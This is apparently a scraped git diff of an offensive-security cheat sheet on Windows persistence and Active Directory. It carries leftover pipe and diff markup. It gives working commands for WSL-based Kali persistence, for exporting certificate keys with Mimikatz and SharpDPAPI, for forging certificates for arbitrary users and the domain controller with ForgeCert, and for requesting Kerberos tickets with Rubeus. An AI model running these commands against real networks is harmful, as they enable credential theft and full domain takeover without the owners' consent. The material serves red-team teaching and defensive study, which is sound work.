Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
|
Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Virtual Machines
|
### Virtual Machines
|
||||||
|
|
||||||
> Based on the Shadow Bunny technique.
|
> Based on the Shadow Bunny technique.
|
||||||
|
@ -588,7 +583,6 @@ Add-AppxPackage .\debian.appx
|
||||||
wsl kali-linux --user root
|
wsl kali-linux --user root
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Domain
|
## Domain
|
||||||
|
|
||||||
### User Certificate
|
### User Certificate
|
||||||
|
@ -610,19 +604,24 @@ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provid
|
||||||
|
|
||||||
* Export CA as p12 file: `certsrv.msc` > `Right Click` > `Back up CA...`
|
* Export CA as p12 file: `certsrv.msc` > `Right Click` > `Back up CA...`
|
||||||
* Alternative 1: Using Mimikatz you can extract the certificate as PFX/DER
|
* Alternative 1: Using Mimikatz you can extract the certificate as PFX/DER
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
privilege::debug
|
privilege::debug
|
||||||
crypto::capi
|
crypto::capi
|
||||||
crypto::cng
|
crypto::cng
|
||||||
crypto::certificates /systemstore:local_machine /store:my /export
|
crypto::certificates /systemstore:local_machine /store:my /export
|
||||||
```
|
```
|
||||||
|
|
||||||
* Alternative 2: Using SharpDPAPI, then convert the certificate: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx`
|
* Alternative 2: Using SharpDPAPI, then convert the certificate: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx`
|
||||||
* [ForgeCert](https://github.com/GhostPack/ForgeCert) - Forge a certificate for any active domain user using the CA certificate
|
* [ForgeCert](https://github.com/GhostPack/ForgeCert) - Forge a certificate for any active domain user using the CA certificate
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName harry@lab.local --NewCertPath harry.pfx --NewCertPassword Password123
|
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName harry@lab.local --NewCertPath harry.pfx --NewCertPassword Password123
|
||||||
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName DC$@lab.local --NewCertPath dc.pfx --NewCertPassword Password123
|
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName DC$@lab.local --NewCertPath dc.pfx --NewCertPassword Password123
|
||||||
```
|
```
|
||||||
|
|
||||||
* Finally you can request a TGT using the Certificate
|
* Finally you can request a TGT using the Certificate
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Rubeus.exe asktgt /user:ron /certificate:harry.pfx /password:Password123
|
Rubeus.exe asktgt /user:ron /certificate:harry.pfx /password:Password123
|
||||||
```
|
```
|
||||||
|
|
Loading…
Reference in New Issue